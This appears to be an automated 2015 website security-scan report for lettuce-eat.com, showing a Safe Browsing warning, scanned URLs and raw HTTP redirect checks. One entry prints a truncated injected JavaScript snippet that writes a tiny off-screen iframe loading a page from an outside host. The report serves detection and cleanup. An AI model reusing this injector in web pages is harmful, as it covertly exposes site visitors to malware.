Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lettuce-eat.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lettuce-eat.com/ | HTTP/1.1 200 OK Connection: close Date: Thu, 26 Feb 2015 15:30:07 GMT Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding Content-Length: 2369 Content-Type: text/html Last-Modified: Wed, 21 May 2014 21:23:49 GMT | clean |
http://www.utahlaptops.com/sale/index.htm | 200 OK Content-Length: 2798 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function hhmpp09() { var static='ajax'; var controller='index.php'; var hhmpp = document.createElement('iframe'); hhmpp.src = 'http://nkbk1.presenthost.net/wbdfCMxk.php'; hhmpp.style.position = 'absolute'; hhmpp.style.color = '5'; hhmpp.style.height = '5px'; hhmpp.style.width = '5px'; hhmpp.style.left = '10005'; hhmpp.style.top = '10005'; if (!document.getElementById('hhmpp')) { document.write('<p id=\'hhmpp\' class=\'hhmpp09\' ></p>'); document.getElementById('hhmpp').app Antivirus reports:
| ||
http://www.utahlaptops.com/test404page.js | 404 Not Found Content-Length: 2674 Content-Type: text/html | clean |
http://cdn.dsultra.com/js/registrar.js | 200 OK Content-Length: 1688 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lettuce-eat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 15:30:07 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 2369
Content-Type: text/html
Last-Modified: Wed, 21 May 2014 21:23:49 GMT
...2369 bytes of data.
GET / HTTP/1.1
Host: lettuce-eat.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 26 Feb 2015 15:30:07 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 2369
Content-Type: text/html
Last-Modified: Wed, 21 May 2014 21:23:49 GMT
...2369 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lettuce-eat.com
Referer: http://www.google.com/search?q=lettuce-eat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lettuce-eat.com
Referer: http://www.google.com/search?q=lettuce-eat.com
Result:
The result is similar to the first query. There are no suspicious redirects found.